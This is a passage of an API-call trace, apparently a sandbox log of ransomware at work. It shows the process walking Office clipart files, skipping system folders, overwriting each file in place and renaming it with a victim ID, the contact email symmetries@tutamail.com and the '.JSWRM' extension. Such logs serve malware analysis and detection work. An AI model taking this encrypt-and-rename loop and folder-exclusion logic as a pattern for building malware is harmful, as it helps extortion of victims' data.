| out: lpMultiByteStr="AN00853_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0073.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0073.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00853_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00853_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00853_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0073.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.826] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20578) returned 1 [0073.826] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5060) returned 0x24c1d0 [0073.827] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5060, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x5060, lpOverlapped=0x0) returned 1 [0073.987] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.987] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5060, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x5060, lpOverlapped=0x0) returned 1 [0073.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.988] CloseHandle (hObject=0x460) returned 1 [0073.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0073.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0073.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0073.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0073.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0073.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0073.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0073.988] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0073.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.989] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a50, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN00914_.WMF", cAlternateFileName="")) returned 1 [0073.989] lstrcmpiW (lpString1="AN00914_.WMF", lpString2=".") returned 1 [0073.989] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="..") returned 1 [0073.989] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="...") returned 1 [0073.989] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="windows") returned -1 [0073.989] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="recovery") returned -1 [0073.989] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="perflogs") returned -1 [0073.989] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="documents and settings") returned -1 [0073.989] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0073.989] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="system volume information") returned -1 [0073.989] lstrcmpiW (lpString1="AN00914_.WMF", lpString2="msocache") returned -1 [0073.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0073.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00914_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00914_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00914_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0073.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0073.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00914_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00914_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00914_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0073.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.990] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10832) returned 1 [0073.990] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a50) returned 0x24c1d0 [0073.990] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2a50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2a50, lpOverlapped=0x0) returned 1 [0073.992] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.992] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2a50, lpOverlapped=0x0) returned 1 [0073.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.993] CloseHandle (hObject=0x460) returned 1 [0073.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0073.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0073.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0073.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0073.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0073.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.993] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0073.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.994] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x385c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN00932_.WMF", cAlternateFileName="")) returned 1 [0073.994] lstrcmpiW (lpString1="AN00932_.WMF", lpString2=".") returned 1 [0073.994] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="..") returned 1 [0073.994] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="...") returned 1 [0073.994] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="windows") returned -1 [0073.994] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="recovery") returned -1 [0073.994] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="perflogs") returned -1 [0073.994] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="documents and settings") returned -1 [0073.994] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0073.994] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="system volume information") returned -1 [0073.994] lstrcmpiW (lpString1="AN00932_.WMF", lpString2="msocache") returned -1 [0073.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00932_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00932_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00932_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0073.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00932_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00932_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00932_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0073.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.994] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14428) returned 1 [0073.995] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3850) returned 0x24c1d0 [0073.995] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3850, lpOverlapped=0x0) returned 1 [0073.997] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.997] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3850, lpOverlapped=0x0) returned 1 [0073.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.997] CloseHandle (hObject=0x460) returned 1 [0073.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0073.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0073.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0073.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0073.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0073.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.998] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0073.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.998] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN00965_.WMF", cAlternateFileName="")) returned 1 [0073.998] lstrcmpiW (lpString1="AN00965_.WMF", lpString2=".") returned 1 [0073.998] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="..") returned 1 [0073.998] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="...") returned 1 [0073.998] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="windows") returned -1 [0073.999] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="recovery") returned -1 [0073.999] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="perflogs") returned -1 [0073.999] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="documents and settings") returned -1 [0073.999] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0073.999] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="system volume information") returned -1 [0073.999] lstrcmpiW (lpString1="AN00965_.WMF", lpString2="msocache") returned -1 [0073.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0073.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00965_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00965_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00965_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0073.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00965_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00965_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00965_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), 